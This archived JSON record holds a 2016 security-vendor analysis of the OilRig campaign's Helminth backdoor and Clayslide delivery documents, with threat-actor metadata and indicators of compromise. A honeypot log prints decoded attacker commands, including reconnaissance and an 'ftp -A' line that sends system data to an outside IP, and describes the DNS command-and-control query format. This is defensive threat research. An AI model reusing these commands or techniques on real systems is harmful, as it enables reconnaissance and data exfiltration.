{
	"id": "ce8ac920-0d90-4832-b4e1-0595688f96ac",
	"created_at": "2026-04-06T00:14:24.548908Z",
	"updated_at": "2026-04-10T03:37:36.888315Z",
	"deleted_at": null,
	"sha1_hash": "bc463df385a1da4e323f0cc33ac6fcedf0d2af86",
	"title": "OilRig Malware Campaign Updates Toolset and Expands Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1280621,
	"plain_text": "OilRig Malware Campaign Updates Toolset and Expands Targets\r\nBy Josh Grunzweig, Robert Falcone\r\nPublished: 2016-10-04 · Archived: 2026-04-05 13:56:46 UTC\r\nSince our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new\r\nactivity. In recent weeks we've discovered that the group have been actively updating their Clayslide delivery documents, as\r\nwell as the Helminth backdoor used against victims. Additionally, the scope of organizations targeted by this group has\r\nexpanded to not only include organizations within Saudi Arabia, but also a company in Qatar and government organizations\r\nin Turkey, Israel and the United States.\r\nExpanded Targeting\r\nThe group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel\r\ndocuments to compromise victims. As an example, the following email was sent to a Turkish government organization using\r\na lure of purported new portal logins for an airline’s website. (Please note that the sender email used in the figure below may\r\nhave been spoofed.)\r\nFigure 1 Phishing email sent to Turkish government organization\r\nWhen the users.xls file is executed and macros are enabled, the victim is presented with the following decoy document.\r\nhttp://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/\r\nPage 1 of 12\n\nFigure 2 Content contained in malicious Helminth XLS file\r\nThis same document content was used with Helminth samples targeting government organizations in multiple nations. For\r\nthose particular attacks, the following filenames were witnessed:\r\nHelp-Yemen.xls\r\nusers.xls\r\nIn addition to these instances, multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth\r\nsamples earlier this year. 
In those cases, the documents used to carry the malicious macro code were very specific to the organization receiving them and in some cases were sent from partner organizations that already had a relationship with the recipient.\r\nUpdates to Toolset\r\nIn recent months, we’ve tracked a number of changes to the malware used by the actors responsible for OilRig. In the past five months, we’ve identified four distinct variants, each of which drops different filenames upon execution. These variants use the following filenames when dropped. (Please note that FireEye was notified about the use of their company name in the malware upon discovery.)\r\nupdate.vbs / dns.ps1\r\nfireeye.vbs / fireeye.ps1\r\nupd.vbs / dn.ps1\r\nkomisova.vbs / komisova.ps1\r\nThe following timeline shows the prevalence of each variant.\r\nFigure 6 Helminth variants over time\r\nAs we can see in the above timeline, the attackers shifted from the update.vbs variant of their malware in late May 2016 to the fireeye.vbs variant. More recently, the upd.vbs variant was discovered, which appears to be an actively developed copy. Comments and other artifacts were discovered in this variant, which will be discussed further later in this post. Most recently, the komisova.vbs variant was discovered in use.\r\nChanges in VBScripts Between Variants\r\nOverall, there are minimal changes in the dropped VBS files between variants. As a reminder, the VBS script is responsible for communicating with a remote server via HTTP. The script repeatedly attempts to download a file from the remote server, and proceeds to execute it when available. The output of this file is then uploaded via another HTTP request. 
It will also execute the PowerShell script that is dropped by the Clayslide Excel documents.\r\nOverall, there are minor differences between the variants observed. The main differences appear to be in the domains and IP addresses used. The following URLs are used by each:\r\nupdate.vbs\r\nhxxp://winodwsupdates[.]me/counter.aspx?req=\r\nhxxp://go0gIe[.]com/sysupdate.aspx?req=\r\nfireeye.vbs\r\nhxxp://update-kernal[.]net/update-index.aspx?req=\r\nhxxp://upgradesystems[.]info/upgrade-index.aspx?req=\r\nhxxp://yahoooooomail[.]com/update-index.aspx?req=\r\nhxxp://googleupdate[.]download/update-index.aspx?req=\r\nupd.vbs\r\nhxxp://83.142.230[.]138:7020/update.php?req=\r\nkomisova.vbs\r\nhxxp://googleupdate[.]download/update-index.aspx?req=\r\nA few things to note include the fact that the komisova.vbs variant uses the same URL witnessed in the fireeye.vbs variant. It’s worth pointing out that this domain was only seen in the most recent fireeye.vbs variants, so it’s very possible that it was used in a transition phase when the attackers were switching over to komisova.\r\nWe previously mentioned that the Excel file dropping upd.vbs was likely a development version. Evidence supporting this claim includes the fact that this file connects to a bare IP address (rather than a domain) on a non-standard port. One particularly interesting feature of this IP address is that it has ties to the Remexi report issued by Symantec in late 2015. This is in line with previous evidence suggesting an Iranian-based actor behind these attacks.\r\nFigure 7 Ties between IP address and Remexi (Shown in PassiveTotal)\r\nThe underlying code of upd.vbs is much cleaner when comparing it against the other variants. This can be seen below. 
This provides additional evidence that it is being actively developed.\r\nFigure 8 Differences between upd.vbs and komisova.vbs\r\nAnother minor difference observed in the upd.vbs variant is the location of files that are downloaded. The three other variants all place downloaded files within a subfolder that resides in %PUBLIC%/Libraries. However, this particular one-off places its files within subfolders that reside in %USERPROFILE%/AppData/Local/Microsoft/Media/.\r\nChanges in PS1 Between Variants\r\nSimilar to the VBS file, the PS1 file will also communicate with a remote server. Unlike the VBS file, the PS1 file uses DNS instead of HTTP. Commands and file locations are received from the remote server and executed, and the output of these commands is in turn uploaded via additional DNS requests. For an in-depth analysis of how this occurs, please refer to our previous OilRig blog post. Overall, there are very minor differences between the dns, fireeye, and komisova PS1 variants. However, the dn.ps1 variant looks to have been updated considerably. 
In addition to these updates, the file is also heavily commented, providing further evidence that this particular file is being actively developed.\r\nFigure 9 Beginning of dn.ps1 variant\r\nThe dn.ps1 variant will perform DNS queries with the following characteristics:\r\nrne_[victim_id]_[random].hostname\r\nrd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nbne_[victim_id]_[random].hostname\r\nbd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nu_[victim_id]_[filename]_[byte_position]_[random].hostname\r\nIn the above queries, the ‘rne’ command asks the remote server if a normal file is available for download. If it is, the server responds with ‘OK’, followed by the filename. In such a situation, the malware will perform the ‘rd’ command, which actually downloads the file in question.\r\nSimilarly, the same execution flow is seen for the ‘bne’ and ‘bd’ commands respectively, only this particular operation is looking for a batch file. While downloading a file, the malware looks for the string ‘EOFEOF’ to signal the end of the data stream.\r\nThe ‘u’ command is used to upload data that is generated from any provided files or scripts. Data is uploaded in chunks, with the ‘byte_position’ variable holding the current byte position within the uploaded file.\r\nWe ran this particular variant for a number of days, and were able to solicit the attackers to interact with our honeypot. 
A Python script was used to parse the collected PCAP, with the following results (truncated for brevity):\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1988996938.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1404872126.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK1.txt\r\n[*] Filename: 1.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_0_840824109.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: aG9zdG5hbWU=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_8_1643283204.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: hostname\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1534172028.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK2.txt\r\n[*] Filename: 2.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_0_579093369.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: c3lzdGVtaW5mbw==\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_10_1446367320.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: systeminfo\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1130109782.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1735654322.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK3.txt\r\n[*] Filename: 3.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_0_122829473.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_27_1524268269.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: 
EOFEOF\r\n[*] Decoded Stream: start ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_117849324.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_926300114.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK5.txt\r\n[*] Filename: 5.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_0_1307455992.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3lzdGVtaW5mbz4_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQgfCBmdHAgLUEgODcuMTE3LjIwNC4x\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_150_2072649310.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NDM=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_152_1977692291.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: whoami\u003ec:\\windows\\temp\\t.txt\r\nipconfig\u003e\u003ec:\\windows\\temp\\t.txt\r\nsysteminfo\u003e\u003ec:\\windows\\temp\\t.txt\r\necho PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_155964816.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1003791024.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK7.txt\r\n[*] Filename: 7.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_0_1649905845.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | Type: TXT\r\n[+] Query: 
bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: start ftp -A 83.142.230.138\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1205170103.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_779542217.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK11.txt\r\n[*] Filename: 11.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_0_1213525986.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_17_651256114.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: @echo off\r\necho 1\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_816831185.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\nAs we can see, a number of interesting commands were received from the attackers, including attempts to communicate with remote FTP servers and various reconnaissance commands. These commands came at seemingly random intervals, indicating they likely resulted from an actual attacker issuing them, versus an automated system.\r\nConclusion\r\nThe attackers using the Helminth and Clayslide malware families continue to target various high value companies and organizations across the globe using their customized malware. This malware is under active development and continues to be updated and improved upon, as witnessed in the files discussed in this blog post. 
While the malware deployed is not terribly sophisticated, it uses techniques such as DNS command and control (C2) that allow it to stay under the radar at many establishments.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nWildFire identifies all Helminth and Clayslide samples as malicious\r\nDomains identified as command and control servers are flagged as malicious\r\nAutoFocus tags Helminth and Clayslide may be used to track this group\r\nIndicators of Compromise\r\nC2 Servers\r\nshalaghlagh[.]tk\r\ngo0gIe[.]com\r\nwinodwsupdates[.]me\r\nupdate-kernal[.]net\r\ngoogleupdate[.]download\r\nyahoooooomail[.]com\r\nupgradesystems[.]info\r\nFile Paths\r\n%PUBLIC%/Libraries/dn\r\n%PUBLIC%/Libraries/up\r\n%USERPROFILE%/AppData/Local/Microsoft/Media/up\r\n%USERPROFILE%/AppData/Local/Microsoft/Media/dn\r\nSource: 
http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
	],
	"report_names": [
		"unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets"
	],
	"threat_actors": [
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434464,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.pdf",
		"text": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.txt",
		"img": "https://archive.orkl.eu/bc463df385a1da4e323f0cc33ac6fcedf0d2af86.jpg"
	}
}